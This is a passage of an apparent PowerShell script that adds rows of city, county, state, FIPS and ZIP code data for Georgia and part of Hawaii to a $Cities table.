$Cities.Rows.Add("Culloden","Monroe","Georgia","GA","13","31016") + $null = $Cities.Rows.Add("Danville","Twiggs","Georgia","GA","13","31017") + $null = $Cities.Rows.Add("Davisboro","Washington","Georgia","GA","13","31018") + $null = $Cities.Rows.Add("Dexter","Laurens","Georgia","GA","13","31019") + $null = $Cities.Rows.Add("Dry branch","Twiggs","Georgia","GA","13","31020") + $null = $Cities.Rows.Add("East dublin","Laurens","Georgia","GA","13","31021") + $null = $Cities.Rows.Add("Dudley","Laurens","Georgia","GA","13","31022") + $null = $Cities.Rows.Add("Eastman","Dodge","Georgia","GA","13","31023") + $null = $Cities.Rows.Add("Eatonton","Putnam","Georgia","GA","13","31024") + $null = $Cities.Rows.Add("Elko","Houston","Georgia","GA","13","31025") + $null = $Cities.Rows.Add("Zcta 31027","Laurens","Georgia","GA","13","31027") + $null = $Cities.Rows.Add("Centerville","Houston","Georgia","GA","13","31028") + $null = $Cities.Rows.Add("Forsyth","Monroe","Georgia","GA","13","31029") + $null = $Cities.Rows.Add("Fort valley","Peach","Georgia","GA","13","31030") + $null = $Cities.Rows.Add("Stevens pottery","Wilkinson","Georgia","GA","13","31031") + $null = $Cities.Rows.Add("Gray","Jones","Georgia","GA","13","31032") + $null = $Cities.Rows.Add("Haddock","Jones","Georgia","GA","13","31033") + $null = $Cities.Rows.Add("Hardwick","Baldwin","Georgia","GA","13","31034") + $null = $Cities.Rows.Add("Harrison","Washington","Georgia","GA","13","31035") + $null = $Cities.Rows.Add("Hawkinsville","Pulaski","Georgia","GA","13","31036") + $null = $Cities.Rows.Add("Helena","Telfair","Georgia","GA","13","31037") + $null = $Cities.Rows.Add("Round oak","Jasper","Georgia","GA","13","31038") + $null = $Cities.Rows.Add("Howard","Taylor","Georgia","GA","13","31039") + $null = $Cities.Rows.Add("Ideal","Macon","Georgia","GA","13","31041") + $null = $Cities.Rows.Add("Irwinton","Wilkinson","Georgia","GA","13","31042") + $null = $Cities.Rows.Add("Jeffersonville","Twiggs","Georgia","GA","13","31044") + $null = $Cities.Rows.Add("Jewell","Warren","Georgia","GA","13","31045") + $null = $Cities.Rows.Add("Juliette","Monroe","Georgia","GA","13","31046") + $null = $Cities.Rows.Add("Kathleen","Houston","Georgia","GA","13","31047") + $null = $Cities.Rows.Add("Kite","Johnson","Georgia","GA","13","31049") + $null = $Cities.Rows.Add("Knoxville","Crawford","Georgia","GA","13","31050") + $null = $Cities.Rows.Add("Lilly","Dooly","Georgia","GA","13","31051") + $null = $Cities.Rows.Add("Lizella","Bibb","Georgia","GA","13","31052") + $null = $Cities.Rows.Add("Mc intyre","Wilkinson","Georgia","GA","13","31054") + $null = $Cities.Rows.Add("Mc rae","Telfair","Georgia","GA","13","31055") + $null = $Cities.Rows.Add("Marshallville","Macon","Georgia","GA","13","31057") + $null = $Cities.Rows.Add("Mauk","Marion","Georgia","GA","13","31058") + $null = $Cities.Rows.Add("Milan","Telfair","Georgia","GA","13","31060") + $null = $Cities.Rows.Add("Milledgeville","Baldwin","Georgia","GA","13","31061") + $null = $Cities.Rows.Add("Montezuma","Macon","Georgia","GA","13","31063") + $null = $Cities.Rows.Add("Monticello","Jasper","Georgia","GA","13","31064") + $null = $Cities.Rows.Add("Montrose","Laurens","Georgia","GA","13","31065") + $null = $Cities.Rows.Add("Musella","Crawford","Georgia","GA","13","31066") + $null = $Cities.Rows.Add("Oconee","Washington","Georgia","GA","13","31067") + $null = $Cities.Rows.Add("Oglethorpe","Macon","Georgia","GA","13","31068") + $null = $Cities.Rows.Add("Perry","Houston","Georgia","GA","13","31069") + $null = $Cities.Rows.Add("Pinehurst","Dooly","Georgia","GA","13","31070") + $null = $Cities.Rows.Add("Pineview","Wilcox","Georgia","GA","13","31071") + $null = $Cities.Rows.Add("Pitts","Wilcox","Georgia","GA","13","31072") + $null = $Cities.Rows.Add("Rentz","Laurens","Georgia","GA","13","31075") + $null = $Cities.Rows.Add("Reynolds","Taylor","Georgia","GA","13","31076") + $null = $Cities.Rows.Add("Rhine","Dodge","Georgia","GA","13","31077") + $null = $Cities.Rows.Add("Roberta","Crawford","Georgia","GA","13","31078") + $null = $Cities.Rows.Add("Rochelle","Wilcox","Georgia","GA","13","31079") + $null = $Cities.Rows.Add("Rupert","Taylor","Georgia","GA","13","31081") + $null = $Cities.Rows.Add("Deepstep","Washington","Georgia","GA","13","31082") + $null = $Cities.Rows.Add("Scotland","Telfair","Georgia","GA","13","31083") + $null = $Cities.Rows.Add("Shady dale","Jasper","Georgia","GA","13","31085") + $null = $Cities.Rows.Add("Devereux","Hancock","Georgia","GA","13","31087") + $null = $Cities.Rows.Add("Warner robins","Houston","Georgia","GA","13","31088") + $null = $Cities.Rows.Add("Tennille","Washington","Georgia","GA","13","31089") + $null = $Cities.Rows.Add("Toomsboro","Wilkinson","Georgia","GA","13","31090") + $null = $Cities.Rows.Add("Unadilla","Dooly","Georgia","GA","13","31091") + $null = $Cities.Rows.Add("Vienna","Dooly","Georgia","GA","13","31092") + $null = $Cities.Rows.Add("Warner robins","Houston","Georgia","GA","13","31093") + $null = $Cities.Rows.Add("Warthen","Washington","Georgia","GA","13","31094") + $null = $Cities.Rows.Add("Wrightsville","Johnson","Georgia","GA","13","31096") + $null = $Cities.Rows.Add("Yatesville","Upson","Georgia","GA","13","31097") + $null = $Cities.Rows.Add("Robins a f b","Houston","Georgia","GA","13","31098") + $null = $Cities.Rows.Add("Zcta 310hh","Baldwin","Georgia","GA","13","310HH") + $null = $Cities.Rows.Add("Zcta 310xx","Macon","Georgia","GA","13","310XX") + $null = $Cities.Rows.Add("Huber","Bibb","Georgia","GA","13","31201") + $null = $Cities.Rows.Add("Macon","Bibb","Georgia","GA","13","31204") + $null = $Cities.Rows.Add("Wilson airport","Bibb","Georgia","GA","13","31206") + $null = $Cities.Rows.Add("Macon","Bibb","Georgia","GA","13","31210") + $null = $Cities.Rows.Add("Macon","Bibb","Georgia","GA","13","31211") + $null = $Cities.Rows.Add("Zcta 31216","Bibb","Georgia","GA","13","31216") + $null = $Cities.Rows.Add("Zcta 31217","Bibb","Georgia","GA","13","31217") + $null = $Cities.Rows.Add("Zcta 31220","Bibb","Georgia","GA","13","31220") + $null = $Cities.Rows.Add("Zcta 312hh","Bibb","Georgia","GA","13","312HH") + $null = $Cities.Rows.Add("Allenhurst","Liberty","Georgia","GA","13","31301") + $null = $Cities.Rows.Add("Bloomingdale","Effingham","Georgia","GA","13","31302") + $null = $Cities.Rows.Add("Clyo","Effingham","Georgia","GA","13","31303") + $null = $Cities.Rows.Add("Darien","McIntosh","Georgia","GA","13","31305") + $null = $Cities.Rows.Add("Eden","Effingham","Georgia","GA","13","31307") + $null = $Cities.Rows.Add("Ellabell","Bryan","Georgia","GA","13","31308") + $null = $Cities.Rows.Add("Fleming","Liberty","Georgia","GA","13","31309") + $null = $Cities.Rows.Add("Guyton","Effingham","Georgia","GA","13","31312") + $null = $Cities.Rows.Add("Hinesville","Liberty","Georgia","GA","13","31313") + $null = $Cities.Rows.Add("Fort stewart","Liberty","Georgia","GA","13","31314") + $null = $Cities.Rows.Add("Zcta 31315","Liberty","Georgia","GA","13","31315") + $null = $Cities.Rows.Add("Ludowici","Long","Georgia","GA","13","31316") + $null = $Cities.Rows.Add("Meldrim","Effingham","Georgia","GA","13","31318") + $null = $Cities.Rows.Add("Meridian","McIntosh","Georgia","GA","13","31319") + $null = $Cities.Rows.Add("Midway","Liberty","Georgia","GA","13","31320") + $null = $Cities.Rows.Add("Pembroke","Bryan","Georgia","GA","13","31321") + $null = $Cities.Rows.Add("Pooler","Chatham","Georgia","GA","13","31322") + $null = $Cities.Rows.Add("Riceboro","Liberty","Georgia","GA","13","31323") + $null = $Cities.Rows.Add("Richmond hill","Bryan","Georgia","GA","13","31324") + $null = $Cities.Rows.Add("Rincon","Effingham","Georgia","GA","13","31326") + $null = $Cities.Rows.Add("Sapelo island","McIntosh","Georgia","GA","13","31327") + $null = $Cities.Rows.Add("Tybee island","Chatham","Georgia","GA","13","31328") + $null = $Cities.Rows.Add("Stillwell","Effingham","Georgia","GA","13","31329") + $null = $Cities.Rows.Add("Townsend","McIntosh","Georgia","GA","13","31331") + $null = $Cities.Rows.Add("Walthourville","Long","Georgia","GA","13","31333") + $null = $Cities.Rows.Add("Zcta 313hh","Bryan","Georgia","GA","13","313HH") + $null = $Cities.Rows.Add("Zcta 313xx","Long","Georgia","GA","13","313XX") + $null = $Cities.Rows.Add("Savannah","Chatham","Georgia","GA","13","31401") + $null = $Cities.Rows.Add("State college","Chatham","Georgia","GA","13","31404") + $null = $Cities.Rows.Add("Savannah","Chatham","Georgia","GA","13","31405") + $null = $Cities.Rows.Add("Savannah","Chatham","Georgia","GA","13","31406") + $null = $Cities.Rows.Add("Port wentworth","Chatham","Georgia","GA","13","31407") + $null = $Cities.Rows.Add("Garden city","Chatham","Georgia","GA","13","31408") + $null = $Cities.Rows.Add("Savannah","Chatham","Georgia","GA","13","31410") + $null = $Cities.Rows.Add("Savannah","Chatham","Georgia","GA","13","31411") + $null = $Cities.Rows.Add("Savannah","Chatham","Georgia","GA","13","31415") + $null = $Cities.Rows.Add("M m","Chatham","Georgia","GA","13","31419") + $null = $Cities.Rows.Add("Zcta 314hh","Chatham","Georgia","GA","13","314HH") + $null = $Cities.Rows.Add("Okefenokee","Ware","Georgia","GA","13","31501") + $null = $Cities.Rows.Add("Waycross","Ware","Georgia","GA","13","31503") + $null = $Cities.Rows.Add("Alma","Bacon","Georgia","GA","13","31510") + $null = $Cities.Rows.Add("Ambrose","Coffee","Georgia","GA","13","31512") + $null = $Cities.Rows.Add("Baxley","Appling","Georgia","GA","13","31513") + $null = $Cities.Rows.Add("Blackshear","Pierce","Georgia","GA","13","31516") + $null = $Cities.Rows.Add("Bristol","Appling","Georgia","GA","13","31518") + $null = $Cities.Rows.Add("Broxton","Coffee","Georgia","GA","13","31519") + $null = $Cities.Rows.Add("Glynco","Glynn","Georgia","GA","13","31520") + $null = $Cities.Rows.Add("Saint simons isl","Glynn","Georgia","GA","13","31522") + $null = $Cities.Rows.Add("Brunswick","Glynn","Georgia","GA","13","31523") + $null = $Cities.Rows.Add("Brunswick","Glynn","Georgia","GA","13","31525") + $null = $Cities.Rows.Add("Jekyll island","Glynn","Georgia","GA","13","31527") + $null = $Cities.Rows.Add("Denton","Jeff Davis","Georgia","GA","13","31532") + $null = $Cities.Rows.Add("Douglas","Coffee","Georgia","GA","13","31533") + $null = $Cities.Rows.Add("Zcta 31535","Coffee","Georgia","GA","13","31535") + $null = $Cities.Rows.Add("Folkston","Charlton","Georgia","GA","13","31537") + $null = $Cities.Rows.Add("Hazlehurst","Jeff Davis","Georgia","GA","13","31539") + $null = $Cities.Rows.Add("Hoboken","Brantley","Georgia","GA","13","31542") + $null = $Cities.Rows.Add("Hortense","Brantley","Georgia","GA","13","31543") + $null = $Cities.Rows.Add("Jacksonville","Telfair","Georgia","GA","13","31544") + $null = $Cities.Rows.Add("Jesup","Wayne","Georgia","GA","13","31545") + $null = $Cities.Rows.Add("Zcta 31546","Wayne","Georgia","GA","13","31546") + $null = $Cities.Rows.Add("Kingsland","Camden","Georgia","GA","13","31548") + $null = $Cities.Rows.Add("Lumber city","Telfair","Georgia","GA","13","31549") + $null = $Cities.Rows.Add("Manor","Ware","Georgia","GA","13","31550") + $null = $Cities.Rows.Add("Mershon","Pierce","Georgia","GA","13","31551") + $null = $Cities.Rows.Add("Millwood","Ware","Georgia","GA","13","31552") + $null = $Cities.Rows.Add("Nahunta","Brantley","Georgia","GA","13","31553") + $null = $Cities.Rows.Add("Nicholls","Coffee","Georgia","GA","13","31554") + $null = $Cities.Rows.Add("Odum","Wayne","Georgia","GA","13","31555") + $null = $Cities.Rows.Add("Patterson","Pierce","Georgia","GA","13","31557") + $null = $Cities.Rows.Add("Saint marys","Camden","Georgia","GA","13","31558") + $null = $Cities.Rows.Add("Screven","Wayne","Georgia","GA","13","31560") + $null = $Cities.Rows.Add("Surrency","Appling","Georgia","GA","13","31563") + $null = $Cities.Rows.Add("Waverly","Camden","Georgia","GA","13","31565") + $null = $Cities.Rows.Add("Waynesville","Brantley","Georgia","GA","13","31566") + $null = $Cities.Rows.Add("West green","Coffee","Georgia","GA","13","31567") + $null = $Cities.Rows.Add("White oak","Camden","Georgia","GA","13","31568") + $null = $Cities.Rows.Add("Woodbine","Camden","Georgia","GA","13","31569") + $null = $Cities.Rows.Add("Zcta 315hh","Appling","Georgia","GA","13","315HH") + $null = $Cities.Rows.Add("Zcta 315xx","Camden","Georgia","GA","13","315XX") + $null = $Cities.Rows.Add("Clyattville","Lowndes","Georgia","GA","13","31601") + $null = $Cities.Rows.Add("Bemiss","Lowndes","Georgia","GA","13","31602") + $null = $Cities.Rows.Add("Zcta 31605","Lowndes","Georgia","GA","13","31605") + $null = $Cities.Rows.Add("Zcta 31606","Lowndes","Georgia","GA","13","31606") + $null = $Cities.Rows.Add("Adel","Cook","Georgia","GA","13","31620") + $null = $Cities.Rows.Add("Alapaha","Berrien","Georgia","GA","13","31622") + $null = $Cities.Rows.Add("Argyle","Clinch","Georgia","GA","13","31623") + $null = $Cities.Rows.Add("Axson","Atkinson","Georgia","GA","13","31624") + $null = $Cities.Rows.Add("Barney","Brooks","Georgia","GA","13","31625") + $null = $Cities.Rows.Add("Boston","Thomas","Georgia","GA","13","31626") + $null = $Cities.Rows.Add("Cecil","Cook","Georgia","GA","13","31627") + $null = $Cities.Rows.Add("Dixie","Brooks","Georgia","GA","13","31629") + $null = $Cities.Rows.Add("Du pont","Clinch","Georgia","GA","13","31630") + $null = $Cities.Rows.Add("Fargo","Clinch","Georgia","GA","13","31631") + $null = $Cities.Rows.Add("Hahira","Lowndes","Georgia","GA","13","31632") + $null = $Cities.Rows.Add("Cogdell","Clinch","Georgia","GA","13","31634") + $null = $Cities.Rows.Add("Lakeland","Lanier","Georgia","GA","13","31635") + $null = $Cities.Rows.Add("Lake park","Lowndes","Georgia","GA","13","31636") + $null = $Cities.Rows.Add("Lenox","Cook","Georgia","GA","13","31637") + $null = $Cities.Rows.Add("Morven","Brooks","Georgia","GA","13","31638") + $null = $Cities.Rows.Add("Nashville","Berrien","Georgia","GA","13","31639") + $null = $Cities.Rows.Add("Naylor","Lowndes","Georgia","GA","13","31641") + $null = $Cities.Rows.Add("Pearson","Atkinson","Georgia","GA","13","31642") + $null = $Cities.Rows.Add("Quitman","Brooks","Georgia","GA","13","31643") + $null = $Cities.Rows.Add("Ray city","Berrien","Georgia","GA","13","31645") + $null = $Cities.Rows.Add("Saint george","Charlton","Georgia","GA","13","31646") + $null = $Cities.Rows.Add("Sparks","Cook","Georgia","GA","13","31647") + $null = $Cities.Rows.Add("Statenville","Echols","Georgia","GA","13","31648") + $null = $Cities.Rows.Add("Stockton","Lanier","Georgia","GA","13","31649") + $null = $Cities.Rows.Add("Willacoochee","Atkinson","Georgia","GA","13","31650") + $null = $Cities.Rows.Add("Moody air force","Lowndes","Georgia","GA","13","31699") + $null = $Cities.Rows.Add("Zcta 316hh","Atkinson","Georgia","GA","13","316HH") + $null = $Cities.Rows.Add("Zcta 316xx","Lanier","Georgia","GA","13","316XX") + $null = $Cities.Rows.Add("Albany","Dougherty","Georgia","GA","13","31701") + $null = $Cities.Rows.Add("Bridgeboro","Dougherty","Georgia","GA","13","31705") + $null = $Cities.Rows.Add("Albany","Dougherty","Georgia","GA","13","31707") + $null = $Cities.Rows.Add("Georgia southwes","Sumter","Georgia","GA","13","31709") + $null = $Cities.Rows.Add("Andersonville","Sumter","Georgia","GA","13","31711") + $null = $Cities.Rows.Add("Arabi","Crisp","Georgia","GA","13","31712") + $null = $Cities.Rows.Add("Arlington","Calhoun","Georgia","GA","13","31713") + $null = $Cities.Rows.Add("Ashburn","Turner","Georgia","GA","13","31714") + $null = $Cities.Rows.Add("Attapulgus","Decatur","Georgia","GA","13","31715") + $null = $Cities.Rows.Add("Baconton","Mitchell","Georgia","GA","13","31716") + $null = $Cities.Rows.Add("Bainbridge","Decatur","Georgia","GA","13","31717") + $null = $Cities.Rows.Add("Barwick","Thomas","Georgia","GA","13","31720") + $null = $Cities.Rows.Add("Berlin","Colquitt","Georgia","GA","13","31722") + $null = $Cities.Rows.Add("Blakely","Early","Georgia","GA","13","31723") + $null = $Cities.Rows.Add("Bluffton","Clay","Georgia","GA","13","31724") + $null = $Cities.Rows.Add("Brinson","Decatur","Georgia","GA","13","31725") + $null = $Cities.Rows.Add("Bronwood","Terrell","Georgia","GA","13","31726") + $null = $Cities.Rows.Add("Cairo","Grady","Georgia","GA","13","31728") + $null = $Cities.Rows.Add("Calvary","Grady","Georgia","GA","13","31729") + $null = $Cities.Rows.Add("Camilla","Mitchell","Georgia","GA","13","31730") + $null = $Cities.Rows.Add("Cedar springs","Early","Georgia","GA","13","31732") + $null = $Cities.Rows.Add("Chula","Tift","Georgia","GA","13","31733") + $null = $Cities.Rows.Add("Climax","Decatur","Georgia","GA","13","31734") + $null = $Cities.Rows.Add("Cobb","Sumter","Georgia","GA","13","31735") + $null = $Cities.Rows.Add("Coleman","Randolph","Georgia","GA","13","31736") + $null = $Cities.Rows.Add("Colquitt","Miller","Georgia","GA","13","31737") + $null = $Cities.Rows.Add("Coolidge","Thomas","Georgia","GA","13","31738") + $null = $Cities.Rows.Add("Cuthbert","Randolph","Georgia","GA","13","31740") + $null = $Cities.Rows.Add("Damascus","Early","Georgia","GA","13","31741") + $null = $Cities.Rows.Add("Graves","Terrell","Georgia","GA","13","31742") + $null = $Cities.Rows.Add("De soto","Sumter","Georgia","GA","13","31743") + $null = $Cities.Rows.Add("Doerun","Colquitt","Georgia","GA","13","31744") + $null = $Cities.Rows.Add("Donalsonville","Seminole","Georgia","GA","13","31745") + $null = $Cities.Rows.Add("Edison","Calhoun","Georgia","GA","13","31746") + $null = $Cities.Rows.Add("Ellenton","Colquitt","Georgia","GA","13","31747") + $null = $Cities.Rows.Add("Enigma","Berrien","Georgia","GA","13","31749") + $null = $Cities.Rows.Add("Fitzgerald","Ben Hill","Georgia","GA","13","31750") + $null = $Cities.Rows.Add("Fort gaines","Clay","Georgia","GA","13","31751") + $null = $Cities.Rows.Add("Fowlstown","Decatur","Georgia","GA","13","31752") + $null = $Cities.Rows.Add("Georgetown","Quitman","Georgia","GA","13","31754") + $null = $Cities.Rows.Add("Hartsfield","Colquitt","Georgia","GA","13","31756") + $null = $Cities.Rows.Add("Zcta 31757","Thomas","Georgia","GA","13","31757") + $null = $Cities.Rows.Add("Iron city","Seminole","Georgia","GA","13","31759") + $null = $Cities.Rows.Add("Jakin","Early","Georgia","GA","13","31761") + $null = $Cities.Rows.Add("Leary","Calhoun","Georgia","GA","13","31762") + $null = $Cities.Rows.Add("Leesburg","Lee","Georgia","GA","13","31763") + $null = $Cities.Rows.Add("Leslie","Sumter","Georgia","GA","13","31764") + $null = $Cities.Rows.Add("Meigs","Thomas","Georgia","GA","13","31765") + $null = $Cities.Rows.Add("Morgan","Calhoun","Georgia","GA","13","31766") + $null = $Cities.Rows.Add("Springvale","Randolph","Georgia","GA","13","31767") + $null = $Cities.Rows.Add("Moultrie","Colquitt","Georgia","GA","13","31768") + $null = $Cities.Rows.Add("Newton","Baker","Georgia","GA","13","31770") + $null = $Cities.Rows.Add("Norman park","Colquitt","Georgia","GA","13","31771") + $null = $Cities.Rows.Add("Oakfield","Worth","Georgia","GA","13","31772") + $null = $Cities.Rows.Add("Ochlocknee","Thomas","Georgia","GA","13","31773") + $null = $Cities.Rows.Add("Ocilla","Irwin","Georgia","GA","13","31774") + $null = $Cities.Rows.Add("Omega","Tift","Georgia","GA","13","31775") + $null = $Cities.Rows.Add("Parrott","Terrell","Georgia","GA","13","31777") + $null = $Cities.Rows.Add("Pavo","Thomas","Georgia","GA","13","31778") + $null = $Cities.Rows.Add("Pelham","Mitchell","Georgia","GA","13","31779") + $null = $Cities.Rows.Add("Plains","Sumter","Georgia","GA","13","31780") + $null = $Cities.Rows.Add("Poulan","Worth","Georgia","GA","13","31781") + $null = $Cities.Rows.Add("Rebecca","Turner","Georgia","GA","13","31783") + $null = $Cities.Rows.Add("Sale city","Mitchell","Georgia","GA","13","31784") + $null = $Cities.Rows.Add("Shellman","Randolph","Georgia","GA","13","31786") + $null = $Cities.Rows.Add("Smithville","Lee","Georgia","GA","13","31787") + $null = $Cities.Rows.Add("Sumner","Worth","Georgia","GA","13","31789") + $null = $Cities.Rows.Add("Sycamore","Turner","Georgia","GA","13","31790") + $null = $Cities.Rows.Add("Sylvester","Worth","Georgia","GA","13","31791") + $null = $Cities.Rows.Add("Thomasville","Thomas","Georgia","GA","13","31792") + $null = $Cities.Rows.Add("Abac","Tift","Georgia","GA","13","31794") + $null = $Cities.Rows.Add("Ty ty","Tift","Georgia","GA","13","31795") + $null = $Cities.Rows.Add("Warwick","Worth","Georgia","GA","13","31796") + $null = $Cities.Rows.Add("Whigham","Grady","Georgia","GA","13","31797") + $null = $Cities.Rows.Add("Wray","Irwin","Georgia","GA","13","31798") + $null = $Cities.Rows.Add("Zcta 317hh","Baker","Georgia","GA","13","317HH") + $null = $Cities.Rows.Add("Zcta 317xx","Calhoun","Georgia","GA","13","317XX") + $null = $Cities.Rows.Add("Juniper","Marion","Georgia","GA","13","31801") + $null = $Cities.Rows.Add("Tazewell","Marion","Georgia","GA","13","31803") + $null = $Cities.Rows.Add("Cataula","Harris","Georgia","GA","13","31804") + $null = $Cities.Rows.Add("Cusseta","Chattahoochee","Georgia","GA","13","31805") + $null = $Cities.Rows.Add("Ellaville","Schley","Georgia","GA","13","31806") + $null = $Cities.Rows.Add("Ellerslie","Harris","Georgia","GA","13","31807") + $null = $Cities.Rows.Add("Fortson","Harris","Georgia","GA","13","31808") + $null = $Cities.Rows.Add("Geneva","Talbot","Georgia","GA","13","31810") + $null = $Cities.Rows.Add("Hamilton","Harris","Georgia","GA","13","31811") + $null = $Cities.Rows.Add("Junction city","Talbot","Georgia","GA","13","31812") + $null = $Cities.Rows.Add("Louvale","Stewart","Georgia","GA","13","31814") + $null = $Cities.Rows.Add("Lumpkin","Stewart","Georgia","GA","13","31815") + $null = $Cities.Rows.Add("Manchester","Meriwether","Georgia","GA","13","31816") + $null = $Cities.Rows.Add("Midland","Muscogee","Georgia","GA","13","31820") + $null = $Cities.Rows.Add("Omaha","Stewart","Georgia","GA","13","31821") + $null = $Cities.Rows.Add("Pine mountain","Harris","Georgia","GA","13","31822") + $null = $Cities.Rows.Add("Pine mountain va","Harris","Georgia","GA","13","31823") + $null = $Cities.Rows.Add("Preston","Webster","Georgia","GA","13","31824") + $null = $Cities.Rows.Add("Richland","Stewart","Georgia","GA","13","31825") + $null = $Cities.Rows.Add("Shiloh","Harris","Georgia","GA","13","31826") + $null = $Cities.Rows.Add("Talbotton","Talbot","Georgia","GA","13","31827") + $null = $Cities.Rows.Add("Upatoi","Muscogee","Georgia","GA","13","31829") + $null = $Cities.Rows.Add("Warm springs","Meriwether","Georgia","GA","13","31830") + $null = $Cities.Rows.Add("Waverly hall","Harris","Georgia","GA","13","31831") + $null = $Cities.Rows.Add("Weston","Webster","Georgia","GA","13","31832") + $null = $Cities.Rows.Add("West point","Troup","Georgia","GA","13","31833") + $null = $Cities.Rows.Add("Woodland","Talbot","Georgia","GA","13","31836") + $null = $Cities.Rows.Add("Zcta 318hh","Chattahoochee","Georgia","GA","13","318HH") + $null = $Cities.Rows.Add("Zcta 318xx","Webster","Georgia","GA","13","318XX") + $null = $Cities.Rows.Add("Columbus","Muscogee","Georgia","GA","13","31901") + $null = $Cities.Rows.Add("Columbus","Muscogee","Georgia","GA","13","31903") + $null = $Cities.Rows.Add("Columbus","Muscogee","Georgia","GA","13","31904") + $null = $Cities.Rows.Add("Custer terrace","Chattahoochee","Georgia","GA","13","31905") + $null = $Cities.Rows.Add("Columbus","Muscogee","Georgia","GA","13","31906") + $null = $Cities.Rows.Add("Columbus","Muscogee","Georgia","GA","13","31907") + $null = $Cities.Rows.Add("Columbus","Muscogee","Georgia","GA","13","31909") + $null = $Cities.Rows.Add("Zcta 319hh","Chattahoochee","Georgia","GA","13","319HH") + $null = $Cities.Rows.Add("Zcta 319xx","Chattahoochee","Georgia","GA","13","319XX") + $null = $Cities.Rows.Add("Aiea","Honolulu","Hawaii","HI","15","96701") + $null = $Cities.Rows.Add("Anahola","Kauai","Hawaii","HI","15","96703") + $null = $Cities.Rows.Add("Captain cook","Hawaii","Hawaii","HI","15","96704") + $null = $Cities.Rows.Add("Eleele","Kauai","Hawaii","HI","15","96705") + $null = $Cities.Rows.Add("Ewa beach","Honolulu","Hawaii","HI","15","96706") + $null = $Cities.Rows.Add("Kapolei","Honolulu","Hawaii","HI","15","96707") + $null = $Cities.Rows.Add("Haiku","Maui","Hawaii","HI","15","96708") + $null = $Cities.Rows.Add("Hakalau","Hawaii","Hawaii","HI","15","96710") + $null = $Cities.Rows.Add("Haleiwa","Honolulu","Hawaii","HI","15","96712") + $null = $Cities.Rows.Add("Hana","Maui","Hawaii","HI","15","96713") + $null = $Cities.Rows.Add("Hanalei","Kauai","Hawaii","HI","15","96714") + $null = $Cities.Rows.Add("Hanapepe","Kauai","Hawaii","HI","15","96716") + $null = $Cities.Rows.Add("Hauula","Honolulu","Hawaii","HI","15","96717") + $null = $Cities.Rows.Add("Hawaii national","Hawaii","Hawaii","HI","15","96718") + $null = $Cities.Rows.Add("Hawi","Hawaii","Hawaii","HI","15","96719") + $null = $Cities.Rows.Add("Hilo","Hawaii","Hawaii","HI","15","96720") + $null = $Cities.Rows.Add("Princeville","Kauai","Hawaii","HI","15","96722") + $null = $Cities.Rows.Add("Holualoa","Hawaii","Hawaii","HI","15","96725") + $null = $Cities.Rows.Add("Honokaa","Hawaii","Hawaii","HI","15","96727") + $null = $Cities.Rows.Add("Honomu","Hawaii","Hawaii","HI","15","96728") + $null = $Cities.Rows.Add("Hoolehua","Maui","Hawaii","HI","15","96729") + $null = $Cities.Rows.Add("Kaaawa","Honolulu","Hawaii","HI","15","96730") + $null = $Cities.Rows.Add("Kahuku","Honolulu","Hawaii","HI","15","96731") + $null = $Cities.Rows.Add("Kahului","Maui","Hawaii","HI","15","96732") + $null = $Cities.Rows.Add("Kailua","Honolulu","Hawaii","HI","15","96734") + $null = $Cities.Rows.Add("Zcta 96737","Hawaii","Hawaii","HI","15","96737") + $null = $Cities.Rows.Add("Waikoloa","Hawaii","Hawaii","HI","15","96738") + $null = $Cities.Rows.Add("Kailua kona","Hawaii","Hawaii","HI","15","96740") + $null = $Cities.Rows.Add("Kalaheo","Kauai","Hawaii","HI","15","96741") + $null = $Cities.Rows.Add("Kalaupapa","Kalawao","Hawaii","HI","15","96742") + $null = $Cities.Rows.Add("Kamuela","Hawaii","Hawaii","HI","15","96743") + $null = $Cities.Rows.Add("Kaneohe","Honolulu","Hawaii","HI","15","96744") + $null = $Cities.Rows.Add("Kapaa","Kauai","Hawaii","HI","15","96746") + $null = $Cities.Rows.Add("Kaumakani","Kauai","Hawaii","HI","15","96747") + $null = $Cities.Rows.Add("Kaunakakai","Maui","Hawaii","HI","15","96748") + $null = $Cities.Rows.Add("Keaau","Hawaii","Hawaii","HI","15","96749") + $null = $Cities.Rows.Add("Kealakekua","Hawaii","Hawaii","HI","15","96750") + $null = $Cities.Rows.Add("Kealia","Kauai","Hawaii","HI","15","96751") + $null = $Cities.Rows.Add("Kekaha","Kauai","Hawaii","HI","15","96752") + $null = $Cities.Rows.Add("Kihei","Maui","Hawaii","HI","15","96753") + $null = $Cities.Rows.Add("Kilauea","Kauai","Hawaii","HI","15","96754") + $null = $Cities.Rows.Add("Kapaau","Hawaii","Hawaii","HI","15","96755") + $null = $Cities.Rows.Add("Koloa","Kauai","Hawaii","HI","15","96756") + $null = $Cities.Rows.Add("Kualapuu","Maui","Hawaii","HI","15","96757") + $null = $Cities.Rows.Add("Kunia","Honolulu","Hawaii","HI","15","96759") + $null = $Cities.Rows.Add("Kurtistown","Hawaii","Hawaii","HI","15","96760") + $null = $Cities.Rows.Add("Lahaina","Maui","Hawaii","HI","15","96761") + $null = $Cities.Rows.Add("Laie","Honolulu","Hawaii","HI","15","96762") + $null = $Cities.Rows.Add("Lanai city","Maui","Hawaii","HI","15","96763") + $null = $Cities.Rows.Add("Laupahoehoe","Hawaii","Hawaii","HI","15","96764") + $null = $Cities.Rows.Add("Lihue","Kauai","Hawaii","HI","15","96766") + $null = $Cities.Rows.Add("Makawao","Maui","Hawaii","HI","15","96768") + $null = $Cities.Rows.Add("Makaweli","Kauai","Hawaii","HI","15","96769") + $null = $Cities.Rows.Add("Maunaloa","Maui","Hawaii","HI","15","96770") + $null = $Cities.Rows.Add("Mountain view","Hawaii","Hawaii","HI","15","96771") + $null = $Cities.Rows.Add("Naalehu","Hawaii","Hawaii","HI","15","96772") + $null = $Cities.Rows.Add("Ninole","Hawaii","Hawaii","HI","15","96773") + $null = $Cities.Rows.Add("Ookala","Hawaii","Hawaii","HI","15","96774") + $null = $Cities.Rows.Add("Paauilo","Hawaii","Hawaii","HI","15","96776") + $null = $Cities.Rows.Add("Pahala","Hawaii","Hawaii","HI","15","96777") + $null = $Cities.Rows.Add("Pahoa","Hawaii","Hawaii","HI","15","96778") + $null = $Cities.Rows.Add("Paia","Maui","Hawaii","HI","15","96779") + $null = $Cities.Rows.Add("Papaaloa","Hawaii","Hawaii","HI","15","96780") + $null = $Cities.Rows.Add("Papaikou","Hawaii","Hawaii","HI","15","96781") + $null = $Cities.Rows.Add("Pearl city","Honolulu","Hawaii","HI","15","96782") + $null = $Cities.Rows.Add("Pepeekeo","Hawaii","Hawaii","HI","15","96783") + $null = $Cities.Rows.Add("Volcano","Hawaii","Hawaii","HI","15","96785") + 